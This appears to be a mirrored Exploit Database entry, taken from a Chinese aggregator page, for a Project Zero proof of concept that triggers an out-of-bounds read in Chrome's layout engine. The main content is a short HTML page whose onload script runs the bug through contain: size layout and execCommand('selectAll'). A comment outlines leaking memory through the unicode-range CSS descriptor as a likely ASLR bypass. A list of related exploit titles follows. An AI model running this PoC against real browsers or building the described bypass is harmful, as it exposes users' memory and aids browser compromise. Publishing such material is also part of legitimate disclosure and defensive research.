Google Chrome – ‘layout’ Out-of-Bounds Read

Exploit Database
19 阅读

作者： Google Security Research

日期： 2017-02-22
类别：
- dos
平台：
- multiple
来源：https://www.exploit-db.com/exploits/41434/

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024

Chrome bug:

https://bugs.chromium.org/p/chromium/issues/detail?id=671328

PoC:
-->

<style>
content { contain: size layout; }
</style>
<script>
function leak() {
 document.execCommand("selectAll"); 
 opt.text = ""; 
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>

<!--
Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass.
-->

last Exploits
Google Chrome – ‘layout’ Out-of-Bounds Read的更多信息

SuperMailer v11.20 – Buffer overflow DoS：
Crystal Report Viewer 8.0.0.371 – ActiveX Denial of Service：
Oracle Java Runtime Environment – Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass：
Python 2.7 hotshot Module – ‘pack_string’ Heap Buffer Overflow (PoC)：
iOS Kernel – AppleOscarCompass Use-After-Free：
Go SSH servers 0.0.2 – Denial of Service (PoC)：
Cisco TFTP Server 1.1 – Denial of Service：
Linux Kernel 3.3.5 – Btrfs CRC32C feature Infinite Loop Local Denial of Service：